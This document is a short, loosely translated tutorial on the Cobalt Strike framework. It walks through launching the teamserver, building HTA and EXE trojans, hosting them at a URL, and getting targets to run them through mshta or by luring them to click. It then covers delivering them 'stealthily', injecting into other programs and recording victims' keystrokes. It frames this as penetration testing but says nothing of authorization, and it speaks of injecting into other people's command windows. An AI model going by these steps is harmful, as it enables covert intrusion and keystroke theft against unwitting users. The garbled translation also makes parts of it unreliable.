1. Penetration testing tools
一、CobaltStrike
Abbreviated as CS. Based on the distributed structure, it can realize the work of a single person or a team. Easy to use. (It has good support for the windows operating system, but for the Linux system, an additional plug-in needs to be added)
Click to enter the download address
Initiation and application of CS
This CS is started based on the Linux system, you need to download CS in the Linux system, it is better to download version 4.5 or above, which is more friendly.
1. Start the client
and use the cd command to enter the CS folder.
Enter the command sudo ./teamserver ip password
ip to customize the password for your computer IP password
2. Start the client connection
and then open a command line window, enter the CS folder, enter
sudo ./cobaltstrike
A login window will appear, enter the password you just defined to enter.
3. Production of Trojan horse program:
Two forms of Trojans: HTA EXE
HTA
1. Create a listener:
It is used to perform monitoring related operations after connecting to the target machine.
Cobalt Strike ->Listeners->Create listener name
2. Create a Trojan horse program HTA
The full name of HTA is called HTML Application, a malicious HTML application
When creating an HTA, pass in the previously created listener and save it locally.
Attacks->Packages->HTML Application
3. File hosting
Host the HTA as a file and generate a URL
Attacks->Web Drive-by->Host File
4. URLs can be injected into other people's command line windows
mshta URL
If the mshta command is restricted from input, it can be bypassed.
EXE
1. Create an EXE Trojan program
attack->packages->E, then put it into the listener, and select the output format of windows EXE
As long as the target computer clicks on the exe file, it will be monitored.
2. Delivery method
method of force,
stealthily,
Induce users to click to download by carrying http service
3. Loading into other applications
After monitoring the computer, right-click -> Explore-> port scan
Open all used ports to piggyback Trojans into other programs
Click a port, how to click the inject button to inject, and you can get the monitoring of this program,
Then you can click Log Keystrokes (keyboard recording), and then click view->key, and the keylogging window will pop up. When the target computer keyboard is used, the window will record the keys pressed.
4. Port scanning
Can scan out all IP addresses in the LAN